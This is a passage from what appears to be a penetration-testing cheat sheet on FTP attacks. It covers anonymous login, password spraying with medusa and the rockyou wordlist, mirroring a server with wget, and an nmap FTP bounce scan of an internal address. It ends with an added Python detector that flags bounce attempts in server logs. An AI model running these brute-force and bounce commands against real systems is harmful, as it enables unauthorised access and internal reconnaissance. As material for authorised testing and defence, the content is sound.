FTP anonymous
ftp "$user@$target"
If the FTP server allows anonymous login, use the credential
anonymous:anonymous

Spray and pray
Known username
medusa -u "$user" -P /usr/share/wordlists/rockyou.txt -h "$target" -M ftp
No username
medusa -U ./username.list -P /usr/share/wordlists/rockyou.txt -h "$target" -M ftp

Spider and download
wget -m --no-passive "ftp://$user:$pass@$target"

FTP bounce
Used to scan ports of an internal machine that is not exposed to the public network, by having the FTP server send the traffic on your behalf. It rarely works unless the server is misconfigured or running old software.
nmap -Pn -v -n -p80 -b "$user:$pass@$target" 172.17.0.2
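
On the server side, a bounce attempt shows up as a PORT or EPRT command whose address is not the client's own, often with a low port. The following is an added example, not part of the original page, that flags such commands. The (client IP, command) log records and all function names are constructed for illustration.

```python
import ipaddress
import re

# PORT h1,h2,h3,h4,p1,p2 (RFC 959) and EPRT <d>proto<d>addr<d>port<d> (RFC 2428)
PORT_RE = re.compile(r"^PORT\s+" + ",".join([r"(\d{1,3})"] * 6) + r"\s*$", re.I)
EPRT_RE = re.compile(r"^EPRT\s+(\S)([12])\1(.+?)\1(\d{1,5})\1\s*$", re.I)

def parse_data_target(command):
    """Return (ip, port) requested by a PORT/EPRT command, or None."""
    m = PORT_RE.match(command)
    if m:
        nums = [int(x) for x in m.groups()]
        if any(n > 255 for n in nums):
            return None
        ip = ipaddress.ip_address(".".join(str(n) for n in nums[:4]))
        return ip, nums[4] * 256 + nums[5]  # port = p1*256 + p2
    m = EPRT_RE.match(command)
    if m:
        try:
            return ipaddress.ip_address(m.group(3)), int(m.group(4))
        except ValueError:
            return None
    return None

def check_command(client_ip, command):
    """Return the reasons a command looks like a bounce attempt (empty if none)."""
    target = parse_data_target(command)
    if target is None:
        return []
    ip, port = target
    reasons = []
    if ip != ipaddress.ip_address(client_ip):
        reasons.append("address differs from control-connection peer")
    if port < 1024:
        reasons.append("privileged port")
    return reasons

def scan(records):
    """Return (client_ip, command, reasons) for every suspicious record."""
    hits = [(ip, cmd, check_command(ip, cmd)) for ip, cmd in records]
    return [h for h in hits if h[2]]

# Constructed sample: control-connection peer address and the command it sent.
SAMPLE_LOG = [
    ("203.0.113.7", "USER anonymous"),
    ("203.0.113.7", "PORT 203,0,113,7,195,80"),  # own address, port 50000
    ("203.0.113.7", "PORT 172,17,0,2,0,80"),     # internal host, port 80
    ("203.0.113.7", "EPRT |1|172.17.0.2|22|"),   # internal host, port 22
]
```

A server that rejects these commands outright, as RFC 2577 recommends, closes the bounce path; the same check on logs or captured traffic shows who is trying it.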